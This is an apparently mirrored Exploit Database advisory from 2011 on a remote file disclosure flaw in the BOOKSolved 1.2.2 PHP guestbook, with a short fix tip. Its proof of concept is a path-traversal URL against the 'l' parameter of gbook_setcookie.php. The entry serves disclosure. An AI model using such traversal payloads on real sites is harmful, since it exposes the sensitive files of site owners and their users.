BOOKSolved 1.2.2 – Remote File Disclosure

• Exploit Database
• 17 阅读

• 作者： bd0rk
  日期： 2011-10-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17943/

• ...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability
  
  ...Discovered by bd0rk
  
  ...Contact: bd0rk[at]hackermail.com or follow me on twitter
  
  ...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King 
  
  ...Tested on: Ubuntu-Linux
  
  ...MEZ-Time: 08:17
  
  ...Vendor: http://www.usolved.net/
  
  ...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip
  
  ----------------------------------------------------------------------------
  
  PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php
  
  ----------------------------------------------------------------------------
  
  Description: Found vulnerable code in gbook_setcookie.php line 7.
   So an attacker can read in sensitive files about l-parameter.
  
  
  bd0rk's-Fixtip: Percolate the l-parameter before $_GET 
  
  
  
  Greetings from Germany, the 22 years old bd0rk.